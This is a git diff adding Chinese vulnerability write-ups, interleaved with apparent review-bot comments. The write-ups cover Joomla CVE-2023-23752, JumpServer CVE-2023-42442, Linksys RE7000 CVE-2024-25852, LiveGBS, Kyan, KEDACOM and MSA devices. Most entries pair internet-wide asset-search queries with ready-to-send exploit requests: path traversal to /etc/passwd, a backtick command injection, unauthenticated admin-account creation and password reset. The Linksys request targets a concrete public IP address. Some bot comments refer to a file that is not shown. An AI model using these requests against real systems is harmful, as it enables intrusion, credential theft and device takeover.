+![image-20240820094038330](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408200941857.png) \ No newline at end of file diff --git a/Joomla-未授权漏洞CVE-2023-23752.md b/Joomla-未授权漏洞CVE-2023-23752.md new file mode 100644 index 0000000..0340d73 --- /dev/null +++ b/Joomla-未授权漏洞CVE-2023-23752.md 
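Review bot: the summary of JieLink+智能终端操作平台多个接口处存在敏感信息泄露漏洞.md says an attacker could 修改数据库中的数据,例如添加、删除或修改记录, but the title and all three requests (`GetDataList`, `GetParkInThroughDeivces`) are read-only listings, i.e. information disclosure; align the impact statement with the requests. The `Accept: application/json, text/javascript, \*/\*; q=0.01` headers carry markdown-escaped asterisks inside a code fence and should read `*/*`. The third request declares `Content-Length: 2` with no body, and the `Authorization: Bearer test` and `userid=admin` values suggest the endpoints accept any token; if so, that is the actual defect and deserves a sentence in the summary.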
@@ -0,0 +1,262 @@ +## Joomla 未授权漏洞 CVE-2023-23752 + +受影响的版本:4.0.0 ~ 4.2.7 + +存在漏洞的路由为Rest API,Rest API于4.x正式开发 + +## 下载地址: +https://downloads.joomla.org/cms/joomla4/4-2-7/Joomla_4-2-7-Stable-Full_Package.zip?format=zip + +## Payload +``` +通过此API用于获取网站最重要的配置信息,其中包含数据库的账号与密码。 + +/api/index.php/v1/config/application?public=true +``` +![](./assets/_20230922171727.png) + + +## 其他api +``` +v1/banners +v1/banners/:id +v1/banners +v1/banners/:id +v1/banners/:id +v1/banners/clients +v1/banners/clients/:id +v1/banners/clients +v1/banners/clients/:id +v1/banners/clients/:id +v1/banners/categories +v1/banners/categories/:id +v1/banners/categories +v1/banners/categories/:id +v1/banners/categories/:id +v1/banners/:id/contenthistory +v1/banners/:id/contenthistory/keep +v1/banners/:id/contenthistory +v1/config/application +v1/config/application +v1/config/:component_name +v1/config/:component_name +v1/contacts/form/:id +v1/contacts +v1/contacts/:id +v1/contacts +v1/contacts/:id +v1/contacts/:id +v1/contacts/categories +v1/contacts/categories/:id +v1/contacts/categories +v1/contacts/categories/:id +v1/contacts/categories/:id +v1/fields/contacts/contact +v1/fields/contacts/contact/:id +v1/fields/contacts/contact +v1/fields/contacts/contact/:id +v1/fields/contacts/contact/:id +v1/fields/contacts/mail +v1/fields/contacts/mail/:id +v1/fields/contacts/mail +v1/fields/contacts/mail/:id +v1/fields/contacts/mail/:id +v1/fields/contacts/categories +v1/fields/contacts/categories/:id +v1/fields/contacts/categories +v1/fields/contacts/categories/:id +v1/fields/contacts/categories/:id +v1/fields/groups/contacts/contact +v1/fields/groups/contacts/contact/:id +v1/fields/groups/contacts/contact +v1/fields/groups/contacts/contact/:id +v1/fields/groups/contacts/contact/:id +v1/fields/groups/contacts/mail +v1/fields/groups/contacts/mail/:id +v1/fields/groups/contacts/mail +v1/fields/groups/contacts/mail/:id +v1/fields/groups/contacts/mail/:id +v1/fields/groups/contacts/categories 
+v1/fields/groups/contacts/categories/:id +v1/fields/groups/contacts/categories +v1/fields/groups/contacts/categories/:id +v1/fields/groups/contacts/categories/:id +v1/contacts/:id/contenthistory +v1/contacts/:id/contenthistory/keep +v1/contacts/:id/contenthistory +v1/content/articles +v1/content/articles/:id +v1/content/articles +v1/content/articles/:id +v1/content/articles/:id +v1/content/categories +v1/content/categories/:id +v1/content/categories +v1/content/categories/:id +v1/content/categories/:id +v1/fields/content/articles +v1/fields/content/articles/:id +v1/fields/content/articles +v1/fields/content/articles/:id +v1/fields/content/articles/:id +v1/fields/content/categories +v1/fields/content/categories/:id +v1/fields/content/categories +v1/fields/content/categories/:id +v1/fields/content/categories/:id +v1/fields/groups/content/articles +v1/fields/groups/content/articles/:id +v1/fields/groups/content/articles +v1/fields/groups/content/articles/:id +v1/fields/groups/content/articles/:id +v1/fields/groups/content/categories +v1/fields/groups/content/categories/:id +v1/fields/groups/content/categories +v1/fields/groups/content/categories/:id +v1/fields/groups/content/categories/:id +v1/content/articles/:id/contenthistory +v1/content/articles/:id/contenthistory/keep +v1/content/articles/:id/contenthistory +v1/extensions +v1/languages/content +v1/languages/content/:id +v1/languages/content +v1/languages/content/:id +v1/languages/content/:id +v1/languages/overrides/search +v1/languages/overrides/search/cache/refresh +v1/languages/overrides/site/zh-CN +v1/languages/overrides/site/zh-CN/:id +v1/languages/overrides/site/zh-CN +v1/languages/overrides/site/zh-CN/:id +v1/languages/overrides/site/zh-CN/:id +v1/languages/overrides/administrator/zh-CN +v1/languages/overrides/administrator/zh-CN/:id +v1/languages/overrides/administrator/zh-CN +v1/languages/overrides/administrator/zh-CN/:id +v1/languages/overrides/administrator/zh-CN/:id +v1/languages/overrides/site/en-GB 
+v1/languages/overrides/site/en-GB/:id +v1/languages/overrides/site/en-GB +v1/languages/overrides/site/en-GB/:id +v1/languages/overrides/site/en-GB/:id +v1/languages/overrides/administrator/en-GB +v1/languages/overrides/administrator/en-GB/:id +v1/languages/overrides/administrator/en-GB +v1/languages/overrides/administrator/en-GB/:id +v1/languages/overrides/administrator/en-GB/:id +v1/languages +v1/languages +v1/media/adapters +v1/media/adapters/:id +v1/media/files +v1/media/files/:path/ +v1/media/files/:path +v1/media/files +v1/media/files/:path +v1/media/files/:path +v1/menus/site +v1/menus/site/:id +v1/menus/site +v1/menus/site/:id +v1/menus/site/:id +v1/menus/administrator +v1/menus/administrator/:id +v1/menus/administrator +v1/menus/administrator/:id +v1/menus/administrator/:id +v1/menus/site/items +v1/menus/site/items/:id +v1/menus/site/items +v1/menus/site/items/:id +v1/menus/site/items/:id +v1/menus/administrator/items +v1/menus/administrator/items/:id +v1/menus/administrator/items +v1/menus/administrator/items/:id +v1/menus/administrator/items/:id +v1/menus/site/items/types +v1/menus/administrator/items/types +v1/messages +v1/messages/:id +v1/messages +v1/messages/:id +v1/messages/:id +v1/modules/types/site +v1/modules/types/administrator +v1/modules/site +v1/modules/site/:id +v1/modules/site +v1/modules/site/:id +v1/modules/site/:id +v1/modules/administrator +v1/modules/administrator/:id +v1/modules/administrator +v1/modules/administrator/:id +v1/modules/administrator/:id +v1/newsfeeds/feeds +v1/newsfeeds/feeds/:id +v1/newsfeeds/feeds +v1/newsfeeds/feeds/:id +v1/newsfeeds/feeds/:id +v1/newsfeeds/categories +v1/newsfeeds/categories/:id +v1/newsfeeds/categories +v1/newsfeeds/categories/:id +v1/newsfeeds/categories/:id +v1/plugins +v1/plugins/:id +v1/plugins/:id +v1/privacy/requests +v1/privacy/requests/:id +v1/privacy/requests/export/:id +v1/privacy/requests +v1/privacy/consents +v1/privacy/consents/:id +v1/privacy/consents/:id +v1/redirects 
+v1/redirects/:id +v1/redirects +v1/redirects/:id +v1/redirects/:id +v1/tags +v1/tags/:id +v1/tags +v1/tags/:id +v1/tags/:id +v1/templates/styles/site +v1/templates/styles/site/:id +v1/templates/styles/site +v1/templates/styles/site/:id +v1/templates/styles/site/:id +v1/templates/styles/administrator +v1/templates/styles/administrator/:id +v1/templates/styles/administrator +v1/templates/styles/administrator/:id +v1/templates/styles/administrator/:id +v1/users +v1/users/:id +v1/users +v1/users/:id +v1/users/:id +v1/fields/users +v1/fields/users/:id +v1/fields/users +v1/fields/users/:id +v1/fields/users/:id +v1/fields/groups/users +v1/fields/groups/users/:id +v1/fields/groups/users +v1/fields/groups/users/:id +v1/fields/groups/users/:id +v1/users/groups +v1/users/groups/:id +v1/users/groups +v1/users/groups/:id +v1/users/groups/:id +v1/users/levels +v1/users/levels/:id +v1/users/levels +v1/users/levels/:id +v1/users/levels/:id +``` diff --git a/JumpServer存在未授权访问漏洞(CVE-2023-42442).md b/JumpServer存在未授权访问漏洞(CVE-2023-42442).md new file mode 100644 index 0000000..d62e2c1 --- /dev/null +++ b/JumpServer存在未授权访问漏洞(CVE-2023-42442).md 
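Review bot: in Joomla-未授权漏洞CVE-2023-23752.md the `## 其他api` list repeats most paths up to five times (`v1/banners`, `v1/banners/:id`, `v1/banners`, ...) because the HTTP method column of the route table was dropped; either restore the method in front of each path or deduplicate the list. The summary gives the affected range 4.0.0 ~ 4.2.7 but not the fixed version, and `Rest API于4.x正式开发` should say since which 4.x release the API ships. The sentence `通过此API用于获取网站最重要的配置信息,其中包含数据库的账号与密码。` is explanation and belongs outside the code fence, above the `/api/index.php/v1/config/application?public=true` line.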
@@ -0,0 +1,30 @@ +# JumpServer存在未授权访问漏洞(CVE-2023-42442) + +# 一、漏洞简介 +JumpServer开源堡垒机是一款运维安全审计系统产品,提供身份验证、授权控制、账号管理、安全审计等功能支持,帮助企业快速构建运维安全审计能力。JumpServer开源堡垒机通过企业版或者软硬件一体机的方式,向企业级用户交付开源增值的运维安全审计解决方案。api/api/v1/terminal/sessions/权限控制存在逻辑错误,可以被攻击者匿名访问。未经身份验证的远程攻击者可利用该漏洞下载ssh日志,并可借此远程窃取敏感信息。存储在 S3、OSS 或其他云存储中的ssh会话不受影响。 + +# 二、影响版本 ++ <font style="color:black;">3.0.0 <= JumpServer <= 3.5.4</font> ++ <font style="color:black;">3.6.0 <= JumpServer <= 3.6.3</font> + +# <font style="color:black;">三、资产测绘</font> ++ hunter`app.name="JumpServer"` ++ 特征: + +![1696131346283-6a696011-dc5b-4c76-84a3-1f81b9ffb50b.png](./img/fuItFEC7-w-QTsDh/1696131346283-6a696011-dc5b-4c76-84a3-1f81b9ffb50b-786611.png) + +# 四、漏洞复现 +```plain +GET /api/v1/terminal/sessions/ HTTP/1.1 +Host: xx.xx.xx.xx +User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) +Accept: */* +Connection: Keep-Alive +``` + +![1696131423235-b969b6ea-4f13-4974-8e56-53063704b1ac.png](./img/fuItFEC7-w-QTsDh/1696131423235-b969b6ea-4f13-4974-8e56-53063704b1ac-468514.png) + + + +> 更新: 2024-02-29 23:57:14 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/pgq8hot5pwuqi3oo> \ No newline at end of file diff --git a/KEDACOM数字系统接入网关任意文件读取漏洞.md b/KEDACOM数字系统接入网关任意文件读取漏洞.md new file mode 100644 index 0000000..cdaf2f8 --- /dev/null +++ b/KEDACOM数字系统接入网关任意文件读取漏洞.md 
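Review bot: in JumpServer存在未授权访问漏洞(CVE-2023-42442).md the summary writes the path as `api/api/v1/terminal/sessions/` while the request uses `/api/v1/terminal/sessions/`; fix the doubled `api/`. The 影响版本 and 资产测绘 headings contain `<font style="color:black;">` spans leaked from the yuque export; strip them, as the other entries' headings are plain markdown. The version ranges are useful as given; state explicitly that the releases following 3.5.4 and 3.6.3 carry the fix rather than leaving it implied.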
@@ -0,0 +1,33 @@ +# KEDACOM数字系统接入网关 任意文件读取漏洞 + +# 一、漏洞简介 +KEDACOM 数字系统接入网关 存在任意文件读取漏洞,攻击者通过构造请求可以读取服务器任意文件 + +# 二、影响版本 ++ KEDACOM 数字系统接入网关 + +# 三、资产测绘 ++ hunter`web.body="/**起始端口变量*/"` ++ 特征 + +![1700237094459-93d63897-cd43-41d4-a428-50edf148ea60.png](./img/pnKUapdSU-2Ic2-z/1700237094459-93d63897-cd43-41d4-a428-50edf148ea60-046539.png) + +# 四、漏洞复现 +```plain +GET /gatewayweb/FileDownloadServlet?fileName=test.txt&filePath=../../../../../../../../../../Windows/System32/drivers/etc/hosts%00.jpg&type=2 HTTP/1.1 +Host: xx.xx.xx.xx +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: JSESSIONID=FAEECB621961790CDFC5AB87BBEB1E20; JSESSIONID=760C78AEAACEFF5C9110E58901A9AAC3 +Upgrade-Insecure-Requests: 1 +``` + +![1700237129473-ffbbb7a7-bb7e-4f1b-8d3d-28cb8cb90790.png](./img/pnKUapdSU-2Ic2-z/1700237129473-ffbbb7a7-bb7e-4f1b-8d3d-28cb8cb90790-814993.png) + + + +> 更新: 2024-02-29 23:57:12 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/agh61crlxr5redq2> \ No newline at end of file diff --git a/Kyan网络监控设备run.php远程命令执行漏洞.md b/Kyan网络监控设备run.php远程命令执行漏洞.md new file mode 100644 index 0000000..90d666f --- /dev/null +++ b/Kyan网络监控设备run.php远程命令执行漏洞.md 
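Review bot: in KEDACOM数字系统接入网关任意文件读取漏洞.md the 影响版本 section only repeats the product name; add a version or firmware build, since nothing else lets a reader tell whether a device is fixed. The `Cookie:` header carries two captured `JSESSIONID` values (`FAEECB62...` and `760C78AE...`); replace them with a placeholder, as the `Host: xx.xx.xx.xx` line already is.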
@@ -0,0 +1,39 @@ +# Kyan 网络监控设备 run.php 远程命令执行漏洞 + +# 一、漏洞简介 +Kyan 网络监控设备 run.php可在身份验证的情况下执行任意命令, 配合账号密码泄露漏洞,存在远程命令执行漏洞,可以获取服务器权限。 + +# 二、影响版本 ++ Kyan 网络监控设备 + +# 三、资产测绘 ++ hunter`app.name=="Kyan 网络监控设备"` ++ 特征 + +![1700735696467-ea2f2fba-f004-4687-a3f2-dfb3a2beaa8a.png](./img/koypSHLFpr1LdmCH/1700735696467-ea2f2fba-f004-4687-a3f2-dfb3a2beaa8a-230413.png) + +# 四、漏洞复现 +1. 通过Kyan 网络监控设备密码泄露漏洞登录系统后台 + +```plain +/hosts +``` + +![1700735729224-68725e9b-5914-45cd-b997-a65cc83fa1fb.png](./img/koypSHLFpr1LdmCH/1700735729224-68725e9b-5914-45cd-b997-a65cc83fa1fb-892875.png) + +![1700735740516-f3d3ee66-1525-470f-aa0d-b35990866841.png](./img/koypSHLFpr1LdmCH/1700735740516-f3d3ee66-1525-470f-aa0d-b35990866841-768767.png) + +2. 访问`run.php`,即可执行命令 + +```plain +/run.php +``` + +![1700735869217-7604bb3f-c59f-4273-aa02-9a842732a8ab.png](./img/koypSHLFpr1LdmCH/1700735869217-7604bb3f-c59f-4273-aa02-9a842732a8ab-341331.png) + +![1700735883989-6c9eab4c-8cfb-4276-865c-d7aa6f0c92c7.png](./img/koypSHLFpr1LdmCH/1700735883989-6c9eab4c-8cfb-4276-865c-d7aa6f0c92c7-578727.png) + + + +> 更新: 2024-02-29 23:57:12 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/un5hy49hzv7rnell> \ No newline at end of file diff --git a/Kyan网络监控设备密码泄露漏洞.md b/Kyan网络监控设备密码泄露漏洞.md new file mode 100644 index 0000000..adc9441 --- /dev/null +++ b/Kyan网络监控设备密码泄露漏洞.md 
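Review bot: Kyan网络监控设备run.php远程命令执行漏洞.md depends entirely on the password-leak entry (step 1 is 通过Kyan 网络监控设备密码泄露漏洞登录系统后台) and re-uses its two screenshots; link the sibling file instead of duplicating the images, and say in the summary that the command execution requires an authenticated session, which is why removing the `/hosts` exposure is the immediate mitigation. The 影响版本 section again has no version.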
@@ -0,0 +1,27 @@ +# Kyan 网络监控设备密码泄露漏洞 + +# <font style="color:rgb(23, 46, 77);">一、漏洞简介</font> +Kyan网络监控设备存在账号密码泄露漏洞,该漏洞是由于开发人员将记录账户密码的文件放到网站目录,攻击者可通过访问目录获取Kyan网络监控设备账号密码,进入控制后台。 + +# 二、影响版本 ++ Kyan 网络监控设备 + +# 三、资产测绘 ++ hunter`app.name=="Kyan 网络监控设备"` ++ 特征 + +![1700735696467-ea2f2fba-f004-4687-a3f2-dfb3a2beaa8a.png](./img/Dvtz-ra2AXLF35Rp/1700735696467-ea2f2fba-f004-4687-a3f2-dfb3a2beaa8a-066628.png) + +# 四、漏洞复现 +```plain +/hosts +``` + +![1700735729224-68725e9b-5914-45cd-b997-a65cc83fa1fb.png](./img/Dvtz-ra2AXLF35Rp/1700735729224-68725e9b-5914-45cd-b997-a65cc83fa1fb-623104.png) + +![1700735740516-f3d3ee66-1525-470f-aa0d-b35990866841.png](./img/Dvtz-ra2AXLF35Rp/1700735740516-f3d3ee66-1525-470f-aa0d-b35990866841-536015.png) + + + +> 更新: 2024-02-29 23:57:12 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ph8dyaez8p98x1ah> \ No newline at end of file diff --git a/Linksys-RE7000无线扩展器RCE(CVE-2024-25852).md b/Linksys-RE7000无线扩展器RCE(CVE-2024-25852).md new file mode 100644 index 0000000..903d455 --- /dev/null +++ b/Linksys-RE7000无线扩展器RCE(CVE-2024-25852).md 
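Review bot: in Kyan网络监控设备密码泄露漏洞.md the 一、漏洞简介 heading is wrapped in a `<font style="color:rgb(23, 46, 77);">` span from the yuque export; strip it. The summary says the credential file was placed under the web directory and the POC shows `/hosts`; state plainly that removing that file from the document root (or access-controlling it) is the fix. 影响版本 lacks a version.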
@@ -0,0 +1,43 @@ +# Linksys-RE7000无线扩展器RCE(CVE-2024-25852) + +### 一、漏洞描述 +<font style="color:#000000;">Linksys RE7000无线扩展器在访问控制功能点的AccessControlList参数中存在命令执行漏洞。未经身份验证的远程攻击者可以利用该漏洞获取设备管理员权限。</font> + +### 二、影响版本 +<font style="color:#000000;">Linksys RE7000无线扩展器</font> + +### 三、资产测绘 +body="/login.shtml?ran=" + +![1718333560229-60861c15-6d19-413d-86ff-12a39b9c2c6d.png](./img/vv1PxtfgpgbamSsw/1718333560229-60861c15-6d19-413d-86ff-12a39b9c2c6d-984843.png) + +界面 + +![1718333587335-4900165d-3c0a-4a16-8a8f-b793b87f79c8.png](./img/vv1PxtfgpgbamSsw/1718333587335-4900165d-3c0a-4a16-8a8f-b793b87f79c8-026376.png) + +### 四、漏洞复现 +```plain +PUT /goform/AccessControl HTTP/1.1 +Host: 121.137.162.121 +User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate, br +Connection: close +Upgrade-Insecure-Requests: 1 +Content-Length: 87 + +{"AccessPolicy":"0","AccessControlList":"`ip a>/etc_ro/lighttpd/RE7000_www/qqi.txt`"} + +``` + +构造语句进行发送 + +![1718333420542-224485fe-1557-444d-988e-e192f2531b3a.png](./img/vv1PxtfgpgbamSsw/1718333420542-224485fe-1557-444d-988e-e192f2531b3a-604259.png)访问qqi.txt,这个文件,获取相关信息。 + +![1718333496307-c39af445-f271-4b7f-838a-d9a88beee01f.png](./img/vv1PxtfgpgbamSsw/1718333496307-c39af445-f271-4b7f-838a-d9a88beee01f-602094.png) + + + +> 更新: 2024-06-23 23:46:34 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/zdaghns0azgvr8ns> \ No newline at end of file diff --git a/LiveGBSapidoc存在信息泄漏漏洞.md b/LiveGBSapidoc存在信息泄漏漏洞.md new file mode 100644 index 0000000..bdef4aa --- /dev/null +++ b/LiveGBSapidoc存在信息泄漏漏洞.md 
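Review bot: the POC in Linksys-RE7000无线扩展器RCE(CVE-2024-25852).md uses `Host: 121.137.162.121`, a concrete public address, where every other entry uses `xx.xx.xx.xx` or an empty `Host:`; replace it with a placeholder before publishing, since a real third-party device must not appear in a POC. The 影响版本 section gives no firmware version, and the 资产测绘 line `body="/login.shtml?ran="` is not labelled with the engine (fofa or hunter) as the other entries do. The `<font style="color:#000000;">` spans under 一 and 二 are export residue.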
@@ -0,0 +1,27 @@ +# LiveGBS apidoc存在信息泄漏漏洞 + +# 一、漏洞简介 +LiveGBS是一款基于GB28181协议的安防监控软件,专为集中统一管理和观看所有摄像头、硬盘录像机等设备而设计。它支持GB28181注册接入,可向上级联第三方国标平台,提供可视化的WEB页面管理,使用户能够轻松实现设备的远程监控和管理。LiveGBS具备多项强大功能,包括云台控制、设备录像检索与回放、语音对讲、用户管理等。同时,它支持多种协议流输出,实现浏览器无插件直播,让用户能够随时随地通过Web端查看监控画面。LiveGBS apidoc存在任意用户添加漏洞。 + +# 二、影响版本 ++ LiveGBS + +# 三、资产测绘 ++ fofa`icon_hash="-206100324"` ++ 特征 + +![1714840195509-17413bb5-8988-4807-907b-1335a5357ea9.png](./img/ZN46IKrPByZszen2/1714840195509-17413bb5-8988-4807-907b-1335a5357ea9-331405.png) + +# 四、漏洞复现 +```plain +/apidoc/ +``` + +![1715917410178-42ccf58e-7e43-44fa-97cd-bfa69711f4b3.png](./img/ZN46IKrPByZszen2/1715917410178-42ccf58e-7e43-44fa-97cd-bfa69711f4b3-311655.png) + + + + + +> 更新: 2024-05-18 12:35:10 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/new71fvhetd3ucay> \ No newline at end of file diff --git a/LiveGBSlist存在信息泄漏漏洞.md b/LiveGBSlist存在信息泄漏漏洞.md new file mode 100644 index 0000000..bda33b3 --- /dev/null +++ b/LiveGBSlist存在信息泄漏漏洞.md 
@@ -0,0 +1,36 @@ +# LiveGBS list存在信息泄漏漏洞 + +# 一、漏洞简介 +LiveGBS是一款基于GB28181协议的安防监控软件,专为集中统一管理和观看所有摄像头、硬盘录像机等设备而设计。它支持GB28181注册接入,可向上级联第三方国标平台,提供可视化的WEB页面管理,使用户能够轻松实现设备的远程监控和管理。LiveGBS具备多项强大功能,包括云台控制、设备录像检索与回放、语音对讲、用户管理等。同时,它支持多种协议流输出,实现浏览器无插件直播,让用户能够随时随地通过Web端查看监控画面。LiveGBS list存在信息泄漏漏洞 + +# 二、影响版本 ++ LiveGBS + +# 三、资产测绘 ++ fofa`icon_hash="-206100324"` ++ 特征 + +![1714840195509-17413bb5-8988-4807-907b-1335a5357ea9.png](./img/oU8IW4Y-oZEZ4Two/1714840195509-17413bb5-8988-4807-907b-1335a5357ea9-194956.png) + +# 四、漏洞复现 +```plain +GET /api/v1/user/list?q=&start=0&limit=100&enable=&sort=CreatedAt&order=desc HTTP/1.1 +Host: +Accept: */* +Accept-Encoding: gzip, deflate +sec-ch-ua: "Google Chrome";v="117", "Chromium";v="117", "Not=A?Brand";v="24" +sec-ch-ua-mobile: ?0 +Accept-Language: zh-CN,zh;q=0.9 +sec-ch-ua-platform: "Windows" +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 +X-Requested-With: XMLHttpRequest +``` + +![1715350016028-f7a9c754-ea7f-4f92-8743-04021b14f407.png](./img/oU8IW4Y-oZEZ4Two/1715350016028-f7a9c754-ea7f-4f92-8743-04021b14f407-360953.png) + + + + + +> 更新: 2024-05-18 12:33:59 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ongy3487szmdw9ti> \ No newline at end of file diff --git a/LiveGBSsave存在任意用户添加漏洞.md b/LiveGBSsave存在任意用户添加漏洞.md new file mode 100644 index 0000000..d561450 --- /dev/null +++ b/LiveGBSsave存在任意用户添加漏洞.md 
@@ -0,0 +1,34 @@ +# LiveGBS save存在任意用户添加漏洞 + +# 一、漏洞简介 +LiveGBS是一款基于GB28181协议的安防监控软件,专为集中统一管理和观看所有摄像头、硬盘录像机等设备而设计。它支持GB28181注册接入,可向上级联第三方国标平台,提供可视化的WEB页面管理,使用户能够轻松实现设备的远程监控和管理。LiveGBS具备多项强大功能,包括云台控制、设备录像检索与回放、语音对讲、用户管理等。同时,它支持多种协议流输出,实现浏览器无插件直播,让用户能够随时随地通过Web端查看监控画面。LiveGBS save存在任意用户添加漏洞。 + +# 二、影响版本 ++ LiveGBS + +# 三、资产测绘 ++ fofa`icon_hash="-206100324"` ++ 特征 + +![1714840195509-17413bb5-8988-4807-907b-1335a5357ea9.png](./img/G22NguMpq0EvMZ3E/1714840195509-17413bb5-8988-4807-907b-1335a5357ea9-579412.png) + +# 四、漏洞复现 +```plain +GET /api/v1/user/save?ID=&Username=root12&Role=%E7%AE%A1%E7%90%86%E5%91%98&Enable=true HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 +Connection: close +``` + +添加的用户名为`root12/12345678` + +![1714840241628-f71f03e1-785d-443e-b720-f1650443f616.png](./img/G22NguMpq0EvMZ3E/1714840241628-f71f03e1-785d-443e-b720-f1650443f616-327422.png) + +测试登录 + +![1714840261984-9c870b53-d781-4302-b2dc-fbd1f2352b48.png](./img/G22NguMpq0EvMZ3E/1714840261984-9c870b53-d781-4302-b2dc-fbd1f2352b48-649257.png) + + + +> 更新: 2024-05-18 12:34:46 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/qda2azg0wd52xg13> \ No newline at end of file diff --git a/LiveGBS任意用户密码重置漏洞.md b/LiveGBS任意用户密码重置漏洞.md new file mode 100644 index 0000000..c74ac49 --- /dev/null +++ b/LiveGBS任意用户密码重置漏洞.md 
@@ -0,0 +1,33 @@ +# LiveGBS任意用户密码重置漏洞 + +LiveGBS部分接口存在未授权访问导致,可以通过组合漏洞修改任意用户密码 + +## fofa + +```yaml +icon_hash="-206100324" +``` + +## poc + +### 获取用户id + +``` +/api/v1/user/list?q=&start=&limit=10&enable=&sort=CreatedAt&order=desc +``` + +![image-20240820155005009](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408201550568.png) + +### 通过id更改用户密码 + +``` +/api/v1/user/resetpassword?id=22&password=123456 +``` + +![image-20240820155041297](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408201550695.png) + + + +## 漏洞来源 + +- https://mp.weixin.qq.com/s/6To5_MA83i7rEfrxlqNpAQ \ No newline at end of file diff --git a/MSA互联网管理网关msa任意文件下载漏洞.md b/MSA互联网管理网关msa任意文件下载漏洞.md new file mode 100644 index 0000000..f948d39 --- /dev/null +++ b/MSA互联网管理网关msa任意文件下载漏洞.md @@ -0,0 +1,38 @@ +# MSA 互联网管理网关 msa 任意文件下载漏洞 + +# 一、漏洞简介 +MSA 互联网管理网关存在任意文件读取漏洞,攻击者通过漏洞可以读取服务器任意文件 + +# 二、影响版本 ++ MSA 互联网管理网关 + +# 三、资产测绘 ++ hunter`web.icon=="73043af39b293ade8de257c2370de7bd"` ++ 特征 + +![1700220436423-12e9551e-d966-4699-88e7-29994ba0e863.png](./img/rLV0S0GyUOO9zx0g/1700220436423-12e9551e-d966-4699-88e7-29994ba0e863-060740.png) + +# 四、漏洞复现 +```plain +GET /msa/../../../../etc/passwd HTTP/1.1 +Host: xx.xx.xx.xx +Cookie: msasessionid=-1 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: none +Sec-Fetch-User: ?1 +Te: trailers +Connection: close +``` + +![1700220466285-4e1ffc5d-51d5-48f8-a65c-55206c11be18.png](./img/rLV0S0GyUOO9zx0g/1700220466285-4e1ffc5d-51d5-48f8-a65c-55206c11be18-983178.png) + + + +> 更新: 2024-02-29 23:57:13 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gysgn5ydeuqlba2w> \ No newline at end of file 
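Review bot: in Kyan 网络监控设备密码泄露漏洞.md the `一、漏洞简介` heading is wrapped in a `<font style="color:rgb(23, 46, 77);">…</font>` tag left over from the yuque export while the other three headings in the same file are plain `# 二、…`; drop the wrapper so the headings render consistently, and give a version range (or state that none is known) under `二、影响版本`, which currently only repeats the product name.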
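Review bot: the PoC request in Linksys-RE7000无线扩展器RCE(CVE-2024-25852).md uses `Host: 121.137.162.121`, a real public address, whereas the other writeups use `xx.xx.xx.xx` or leave `Host:` empty; replace it with a placeholder before merging so the repository does not point at a live device. The caption `访问qqi.txt,这个文件,获取相关信息。` is also glued onto the end of the preceding image line and should sit on its own line.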
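Review bot: the last sentence of the summary in LiveGBSapidoc存在信息泄漏漏洞.md, `LiveGBS apidoc存在任意用户添加漏洞。`, contradicts the file title and the `/apidoc/` check below, which shows an exposed API documentation page (information disclosure); this looks copied from the save writeup and should say 信息泄漏.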
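Review bot: in LiveGBSsave存在任意用户添加漏洞.md the request only sets `Username=root12`, `Role` and `Enable=true`, yet the text states the resulting account is `root12/12345678` without saying where the password comes from; state how `12345678` was obtained (for example an initial password the system assigns to new users), otherwise the `测试登录` step cannot be reproduced from the text.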
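Review bot: the opening sentence of LiveGBS任意用户密码重置漏洞.md, `LiveGBS部分接口存在未授权访问导致,可以通过组合漏洞修改任意用户密码`, is ungrammatical (`导致` has no object), and the first step repeats the `/api/v1/user/list` request already documented in LiveGBSlist存在信息泄漏漏洞.md, so a cross-link would be better than a copy. The fofa fence is tagged `yaml` and the two poc fences have no tag, while the rest of the repository uses ```plain.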
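Review bot: MSA互联网管理网关msa任意文件下载漏洞.md sends `Cookie: msasessionid=-1` but never explains whether the traversal depends on that value; document it, or remove it from the PoC if it is not needed. The title says 任意文件下载 while the summary says 任意文件读取; pick one.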
